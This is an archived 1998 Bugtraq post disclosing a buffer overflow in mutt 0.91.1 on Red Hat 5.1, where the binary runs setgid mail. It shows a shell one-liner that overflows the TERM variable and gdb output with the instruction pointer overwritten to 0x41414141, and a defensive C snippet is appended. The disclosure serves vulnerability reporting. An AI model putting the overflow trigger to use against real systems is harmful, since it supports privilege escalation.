[8260] in bugtraq


mutt buffer overflow?

daemon@ATHENA.MIT.EDU (funkySh)
Fri Oct 23 17:18:56 1998

Date: 	Thu, 22 Oct 1998 09:24:51 +0200
Reply-To: funkySh <jn1@ATOMNET.PL>
From: funkySh <jn1@ATOMNET.PL>
To: BUGTRAQ@NETSPACE.ORG

Sorry if this is already known..

There have been some posts about the buffer overflow in mutt
(by sending a specially formatted Content-Type). Here is another
one (I think exploitable) in mutt 0.91.1-2 shipped with
RH 5.1 with setgid mail:

[orbital@PulpFiction /]$ TERM=`perl -e 'print "A" x 240'`
[orbital@PulpFiction /]$ mutt
Segmentation fault
[orbital@PulpFiction /]$ gdb /usr/bin/mutt
...
(gdb) r
Starting program: /usr/bin/mutt

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Mutt 0.91.1-5 still has the same problem, but setgid mail is turned off.





--
funkySh                                        jn1@atomnet.pl
PGP keyID: 768/D837F9A1
fingerprint  36 78 A6 D7 55 38 12 51  05 93 36 65 A0 6E 6D 22
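
Added example, not part of the original post and not mutt's code: the post does not say where the TERM value is copied, so this assumes the usual cause of such a crash (an environment variable copied into a fixed-size buffer without a length check) and shows a bounded, validated alternative. The names `safe_term` and `TERM_MAX`, the 64-byte limit and the allowed character set are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TERM_MAX 64   /* assumed upper bound; real terminal names are far shorter */

/* Copy a TERM-style value into out (outlen bytes) only if it is short enough
 * and consists of characters normally seen in terminal names.
 * Returns 0 if the value was accepted, -1 if it was rejected; on rejection
 * out holds the fallback "dumb" (when out is large enough to hold it). */
int safe_term(const char *value, char *out, size_t outlen)
{
    static const char fallback[] = "dumb";
    size_t len;

    if (out == NULL || outlen < sizeof fallback)
        return -1;
    memcpy(out, fallback, sizeof fallback);

    if (value == NULL)
        return -1;
    /* Validate while measuring, and stop as soon as a limit is exceeded,
     * so an oversized value (e.g. 240 bytes of 'A') is never copied. */
    for (len = 0; value[len] != '\0'; len++) {
        unsigned char c = (unsigned char)value[len];
        if (len >= TERM_MAX || len + 1 >= outlen)
            return -1;
        if (!isalnum(c) && strchr("-_+.", c) == NULL)
            return -1;
    }
    if (len == 0)
        return -1;
    memcpy(out, value, len + 1);   /* len < outlen was checked above; copies the NUL */
    return 0;
}

int main(void)
{
    char term[TERM_MAX + 1];
    int rc = safe_term(getenv("TERM"), term, sizeof term);

    printf("TERM %s, using \"%s\"\n", rc == 0 ? "accepted" : "rejected", term);
    return 0;
}
```

A setgid or setuid program would run a check of this kind on every environment variable it reads before handing the value to library code.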
